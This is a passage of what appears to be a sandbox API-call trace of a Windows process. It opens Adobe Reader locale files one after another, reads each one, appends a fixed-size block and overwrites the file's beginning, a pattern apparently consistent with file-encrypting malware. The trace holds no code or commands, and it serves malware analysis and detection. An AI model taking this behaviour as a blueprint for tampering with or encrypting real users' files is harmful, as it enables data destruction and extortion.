(in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3000 [0072.304] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.305] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0072.305] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.305] CloseHandle (hObject=0x1e8) returned 1 [0072.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\AdobeCollabSync.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\adobecollabsync.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0072.431] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.432] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0072.432] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.432] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.432] ReleaseMutex (hMutex=0x168) returned 1 [0072.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.ESP", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0072.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.ESP", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.ESP", lpUsedDefaultChar=0x0) returned 19 [0072.433] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0072.440] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0072.441] WriteFile (in: hFile=0x1ec, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0072.441] CloseHandle (hObject=0x1ec) returned 1 [0072.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\IA32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\ia32.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0072.442] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.442] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe00 [0072.442] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.442] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.443] ReleaseMutex (hMutex=0x168) returned 1 [0072.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.ESP", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0072.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.ESP", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.ESP", lpUsedDefaultChar=0x0) returned 8 [0072.443] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0072.447] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0072.447] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0072.447] CloseHandle (hObject=0x1ec) returned 1 [0072.448] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\SaveAsRTF.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\saveasrtf.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0072.453] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.453] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4a00 [0072.453] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.453] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.453] ReleaseMutex (hMutex=0x168) returned 1 [0072.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.ESP", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.ESP", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.ESP", lpUsedDefaultChar=0x0) returned 13 [0072.454] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.461] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a00 [0072.461] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.461] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a00 [0072.461] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.462] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0072.462] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.462] CloseHandle (hObject=0x1e8) returned 1 [0072.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\accessibility.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\accessibility.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0072.463] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.463] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xac00 [0072.463] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.463] ReleaseMutex (hMutex=0x168) returned 1 [0072.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.EUQ", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0072.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.EUQ", cchWideChar=17, lpMultiByteStr=0x1f8867c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.EUQ", lpUsedDefaultChar=0x0) returned 17 [0072.463] ReadFile (in: hFile=0x1e8, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.469] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9c00 [0072.469] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.469] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9c00 [0072.470] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.471] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0072.471] WriteFile (in: hFile=0x1e8, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.471] CloseHandle (hObject=0x1e8) returned 1 [0072.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\eBook.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\ebook.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0072.472] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.472] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0072.473] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.473] ReleaseMutex (hMutex=0x168) returned 1 [0072.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.EUQ", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0072.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.EUQ", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.EUQ", lpUsedDefaultChar=0x0) returned 9 [0072.473] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0072.478] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0072.478] WriteFile (in: hFile=0x1e8, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0072.479] CloseHandle (hObject=0x1e8) returned 1 [0072.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\ReadOutLoud.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\readoutloud.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0072.480] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.480] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2c00 [0072.480] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.480] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.480] ReleaseMutex (hMutex=0x168) returned 1 [0072.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.EUQ", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0072.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.EUQ", cchWideChar=15, lpMultiByteStr=0x1f7346c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.EUQ", lpUsedDefaultChar=0x0) returned 15 [0072.480] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.494] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1c00 [0072.495] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.495] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1c00 [0072.495] WriteFile (in: hFile=0x1e8, lpBuffer=0x2664638*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664638*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.496] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0072.497] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.497] CloseHandle (hObject=0x1e8) returned 1 [0072.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\updater.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\updater.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0072.498] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.498] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2a00 [0072.499] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0072.499] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.499] ReleaseMutex (hMutex=0x168) returned 1 [0072.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.EUQ", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0072.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.EUQ", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.EUQ", lpUsedDefaultChar=0x0) returned 11 [0072.499] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.648] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0073.649] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.649] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0073.649] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.649] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0073.650] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0073.650] CloseHandle (hObject=0x1e8) returned 1 [0073.650] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\DigSig.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\digsig.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.651] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0073.651] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1fa00 [0073.651] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0073.651] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.651] ReleaseMutex (hMutex=0x168) returned 1 [0073.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SUO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0073.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SUO", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.SUO", lpUsedDefaultChar=0x0) returned 10 [0073.652] ReadFile (in: hFile=0x1e8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.655] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1ea00 [0073.655] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.656] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1ea00 [0073.657] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.657] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0073.657] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.657] CloseHandle (hObject=0x1e8) returned 1 [0073.658] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\PPKLITE.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\ppklite.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.658] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0073.658] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7d800 [0073.658] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0073.659] 